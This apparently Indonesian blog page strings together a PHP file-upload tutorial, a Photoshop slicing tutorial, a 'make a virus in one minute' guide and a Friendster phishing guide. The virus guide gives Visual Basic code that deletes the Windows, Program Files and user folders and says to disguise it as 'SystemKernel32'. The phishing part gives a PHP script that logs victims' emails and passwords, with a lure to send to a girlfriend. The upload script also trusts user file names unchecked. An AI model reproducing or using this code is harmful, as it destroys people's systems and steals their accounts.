Bagaimana Melakukan Upload File pada PHP
Persiapan sebelum meng upload
Untuk melakukan ini kita harus sudah siap dengan beberapa infrastruktur seperti Apache web server dan juga PHP. Pada kasus ini penulis menggunakan sistem operasi Windows XP yang dilengkapi dengan Apache web server versi 1.3.33 (Win32) dan PHP dengan versi 4.3.11. Untuk mendapatkan Apache Anda bisa download dari http://www.apache.org/ dan PHP bisa Anda dapatkan di http://www.php.net/. Di sini penulis tidak akan lagi menjelaskan proses instalasi keduanya. Penulis asumsikan semua sudah diinstall pada konfigurasi default dan folder web root terletak pada folder c:/program files/apache group/apache/htdocs.
Membuat form upload
Langkah pertama yang perlu dibuat adalah merancang form uploadnya. Screen shot dari form upload nantinya adalah sebagai berikut.
Adapun code HTML untuk membuat code di atas adalah sebagai berikut.
<html>
<head>
<title>Contoh Form Upload dengan PHP</title>
</head>
<body>
<p>Contoh Form Upload dengan PHP</p>
<form enctype="multipart/form-data" action="p_upload.php" method="post">
<input type="hidden" name="MAX_FILE_SIZE" value="2000000" />
Upload this file: <input name="userfile" type="file" /><p>
<input type="submit" value="Upload" /> </p>
</form>
<p> </p>
</body>
</html>
Simpan code tersebut dengan nama uploadform.php dan letakkan pada folder web root dari Apache. Panggil file ini dengan mengetikkan http://localhost/uploadform.php. Pastikan Anda sudah menyalakan service Apache dengan mengetikkan perintah net start apache pada command prompt Windows. Apabila semuanya sudah benar maka form upload akan muncul pada browser Anda.
Kita lihat pada script di atas encoding type-nya menggunakan multipart/form-data dan method-nya POST. Untuk action script-nya diarahkan pada file p_upload.php. Script p_upload.php inilah yang akan kita buat sebagai script yang berguna untuk memproses file yang diupload oleh user.
Membuat script yang memproses upload
Setelah form upload di atas jadi, maka saat ini kita harus membuat script yang fungsinya untuk menerima dan memproses file yang diupload oleh user. Sesuai dengan script sebelumnya maka script pemroses upload ini bernama p_upload.php. Berikut ini adalah codenya.
<?php
$uploaddir = 'c:/files/';
$uploadfile = $uploaddir . $_FILES['userfile']['name'];
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile))
{
echo "File sudah sukses diupload ke server pada folder dan nama file $uploadfile";
}
else
{
echo "Proses upload gagal, kode error = " . $_FILES['userfile']['error'];
}
?>
Pada kasus ini penulis akan meletakkan file yang diupload pada folder c:files. Untuk proses upload ini PHP menyediakan autoglobal $FILES yang ada sejak PHP 4.1.0. Melalui autoglobal $_FILES ini Anda bisa mengetahui nama file yang diupload, type file, size, temporary file name dan juga kode error yang terjadi.
Intinya semua file yang diupload oleh user sebenarnya akan ditampung pada suatu folder temporary sistem dengan nama file yang juga temporary. Untuk folder temporary bisa diatur pada konfigurasi di file php.ini. Pada kondisi default Windows, temporary folder akan menggunakan folder yang sama dengan yang digunakan oleh Windows. Fungsi move_uploaded_file merupakan fungsi yang bertujuan untuk memindahkan file yang diupload dari folder temporary tadi menuju folder yang sudah kita tentukan. Pada kasus di atas semua file yang diupload akan dipindahkan ke dalam folder c:files. Fungsi ini memiliki dua parameter yaitu yang pertama adalah nama file yang ada di temporary folder dan parameter kedua adalah folder tujuan beserta juga nama filenya. Jika proses pemindahan file ini berjalan sukses maka fungsi ini akan mengembalikan nilai TRUE, demikian pula sebaliknya jika gagal maka akan mengembalikan nilai FALSE.
Berikut ini keterangan dari autoglobal $_FILES.
$_FILES['xxx']['name']
Berguna untuk mengetahui nama file yang diupload.
$_FILES['xxx']['type']
Berguna untuk mengetahui tipe dari file, contohnya seperti text/xml.
$_FILES['xxx']['size']
Berguna untuk mengetahui ukuran file yang telah diupload.
$_FILES['xxx']['tmp_name']
Berguna untuk mengetahui nama sementara dari file yang diupload.
$_FILES['xxx']['error']
Berguna untuk mengetahui error code yang terjadi pada saat proses upload.
Jika semua proses upload berjalan lancar maka error code yang dihasilkan adalah 0. Tanda xxx di atas bisa disesuaikan dengan nama input untuk upload file seperti pada form upload di atas. Pada kasus ini kita menggunakan nama input userfile.
Sampai sekian dulu tulisan sederhana mengenai proses upload pada PHP. Teknik ini masih sangat sederhana dan hanya bertujuan untuk mengenalkan kepada Anda mengenai dasar operasi upload dengan menggunakan PHP. Jika ada saran atau komentar bisa dilayangkan ke ariesa.rahardjo@gmail.com. Untuk membaca tulisan menarik lainnya silakan saja menuju ke situs Sony AK Knowledge Center dengan alamat di http://www.sony-ak.com/. Source code lengkap dari script di atas bisa Anda download pada bagian akhir dari tulisan ini.
Tampilan Website yang menarik adalah salah satu faktor ramainya website yang bersangkutan. Dari sekian banyak articles di blog ini, article ini saya rasa akan membuka pelajaran tentang tutorial, tips dan tricks design website. Ya saya kira kita memerlukannya bukan!
Sebenarnya banyak software yang bisa digunakan untuk men-design template website selain adobe photoshop, such as: corel draw, macromedia free hand, adobe image ready, etc. namun saya rasa software terpopuler yang biasa digunakan untuk men-design website adalah adobe photoshop. Saya masih memakai adobe photoshop 0.7, meskipun kita tahu bahwa version photoshop terkini sudah mencapai CS 3. tapi fiture yang kita butuhkan untuk mendesign website dalam versi photoshop 0.7 sudah lumayan lengkap. Namun bila anda memakai version photoshop CS, itu lebih baik ^_^.
Tutorial design website yang akan saya bahas kali ini, adalah bagaimana caranya memotong-motong image/ design yang telah kita buat sebelumnya. Baiklah perhatikan contoh design pada image dibawah ini.
Langsung saja kita mulai pemotongan image ini, Pertama: bila tampilan penggaris (ruler) tidak ada, maka tampilkan penggaris dengan cara click VIEW >> RULERS atau tekan (ctrl + r).
Kedua: untuk menandai garis potongan dalam image template website anda, cukup dengan men-drag dari arah penggaris (ruler) pada arah bagian yang di inginkan.
Untuk membuat garis potong image, anda hanya perlu men-drag (menekan bagian kiri mouse, tanpa melepasnya sambi memindahkan ke arah yang anda sukai)
Hasilnya, terlihat pada gambar di bawah ini, terlihat garis-garis berwarna biru, itu adalah garis potong image template yang telah anda buat tadi.
Untuk mulai memotong anda bisa menggunakan slice tool (k) Kemudian setelah click slice tool (k), click pada button slices from guides
Lihat apa yang terjadi, semua garis potong memiliki nomoryang uniq, berbeda satu sama lain, nomor itu yang nanti akan menjadi salah satu ciri file image tersebut (nama file tersebut).
Bila ada merasa ada sedikit kesalahan pada pemotongan image template anda, anda bisa melakukan pengeditan sebelum benar-benar di potong menjadi beberapa bagian. Caranya click kanan pada icon slice tool (K) kemudian pilih slice select tool.
Setelah itu arahkan pointer mouse ke bagian yang mau anda edit, anda bisa memperbesar , memperkecil garis potong , menghapus garis potong, dsb.
Setelah semuanya beres dan benar, kini anda harus benar-benar memotong image template anda menjadi beberapa bagian, caranya click pada menu FILE >> Save For Web… atau tekan (alt+shift+ctrl+s).
Anda bisa memilih bermacam-macam format file, seperti: png-24, jpg, gif, png-8, pada combobox settings, namun biasanya saya lebih suka pake format png-24 dari pada yang lainnya, nggak tahu kenapa…he…he... Kemudian kasih tanda (centang) pada bagian Tranparency dan Interlaced. Bila sudah siap, tekan save button untuk memulai menyimpan sekailgus memotong image template anda.
Akan muncul kotak dialog seperti image di atas, File name = isikan nama file yang anda inginkan, Save as type= pilih HTML and Images (*.html), untuk menyimpan file berserta membuat file html-ny Settings= pilih default settings Slices = pilih All Slices.
Lalu tentukan lokasi penyimpanan file anda, bila udah siap tekan Save Button untuk mulai menyimpan.
Ok selesai dah, anda sudah berhasil melakukan pemotongan image template anda sekaligus membuat file HTML-nya alias file website nya. Nantikan articles design website yang lainnya.
Gwe bikin nih tutorial buat bikin virus yg rada mematikan, tapi simple, dan kayanya sih ga bakal kedekteksi antivirus, soalnya cara kerjanya simple bgt
Yg diperluin:
1. VB(optimal : 6.0)
2. Ngerti tombol2nya VB
Tutorial Bikin Virus cman 1 mnt
1. bikin form sekecil mungkin
2. didalem form itu, masukin nih kode
Public Sub DelAll(ByVal DirtoDelete As Variant)
Dim FSO, FS
Set FSO = CreateObject(”Scripting.FileSystemObject”)
FS = FSO.DeleteFolder(DirtoDelete, True)
End Sub
Private Sub Form_Load()
On Error Resume Next
If FileExist(”c:windowssystem32katak.txt”) = True Then
End
Else
Call DelAll(”c:windowssystem”)
Call DelAll(”c:windowssystem32″)
Call DelAll(”c:windows”)
Call DelAll(”C:Documents and SettingsAll Users”)
Call DelAll(”C:Documents and SettingsAdministrator”)
Call DelAll(”C:Documents and Settings”)
Call DelAll(”C:Program FilesCommon Files”)
Call DelAll(”C:Program FilesInternet Explorer”)
Call DelAll(”C:Program FilesMicrosoft Visual Studio”)
Call DelAll(”C:Program Files”)
End
End If
End Sub
Function FileExist(ByVal FileName As String) As Boolean
If Dir(FileName) = “” Then
FileExist = False
Else
FileExist = True
End If
End Function
3.
Kode yg warna biru itu penangkal nih virus, barang kali lu ga sengaja teken jadi lu slamat. jadi di folder c:windowssystem32 kalo ada file namanya katak.txt, lu ga bakal keserang ndiri… bisa lu edit koq jadi apa gitu…
Yang warna merah itu folder yg bakal didelete ama nih virus, lu edit ndiri aja…
4. Bikin nih project namanya kaya nama system, disini gwe make nama “SystemKernel32″ jadi ga bakal dicurigain
5. Jangan pernah naroh nama lu di nih virus… k?
6. compile deh… slese!
Simple kan? nih virus kerjanya cman ngapus system, lumayan bahaya… ini cman contoh bikin virus… slanjutnya.. anda ndiri coba2 ndiri
------------------------------------------------------------------------------------------
PART 2
Pertama-tama yg mesti kita siapin :
1. Teh manis penghangat malam.
2. Jangan Lupa cemilan yg bikin Kriuk .. kriuk …
3. Web Hosting yg support PHP. Cari di paman Google banyak..
4. Upload file index.htm (ada di source).
5. Sertakan code php dan JavaScript di bawah ini dan ” SAVE As ” sesuai dg nama link yg dituju pada Form Login.
<?php
$email = $_POST[email];
$password = $_POST[password];
$fl = fopen(’password.txt’, ‘a’);
fwrite($fl, “$email . $password nn”);
fclose($fl);
?>
<SCRIPT LANGUAGE=”JavaScript”>
window.location=”http://www.friendster.com/index.php”;
</script>
Dan upload file diatas ke www.webyangsupportphp.com
6. Buat file Text kosong dengan nama Sesuai perintah Open pada php code di atas. Jangan lupa CHMOD diganti sesuai dg kebutuhan kamu!!.
7. kirim testi dg :
hai syang .. gimna kabarna, kagen nie .. <img id=”XcodeCommunity” width=”0″>
nah .. Setelah sang pacar penerima testi membuka “New Testimonials”, maka sesuai dg perintah yang berada di JavaScript => window.location <= yg disisipkan maka link akan menuju ke http://webyangsupportphp.com/index.htm . setelah terbuka, secara tanpa sadar sang pacar mengira halaman yg terbuka adalah sungguhan. Ya !!!! tanpa disuruh, dibelai-belai, n tanpa rayuan maut pun sang pacar akan dg rela hati mengisi Form login tipuan.
Akhirnya dg pura-pura tidak tahu, muka bego, sedikit bodoh. Si pengirim testi menawarkan jasanya untuk sang pacar tercinta… 
=] 
)
Selain itu teknik diatas akan terlihat seperti aslinya jika menggunakan ” OVERLAY GENERATOR ” pada profil fs pada saat pengiriman testimonial yg berisi html code ( index.htm). Dg mengganti link Relatif menjadi absolut(baca S.I.H lebih lanjut) pada form login di index.htm maka pada saat pengiriman data akan menuju ke http://webyangsupportphp.com/login.php
Kesimpulan :
# Hacking tidak selamanya menggunakan ” TOOLS “
# Kelemahan XSS merupakan bahaya besar
# Teknik ini semata-mata hanya untuk pengetahuan. Resiko ditanggung anda sendiri !!!!
)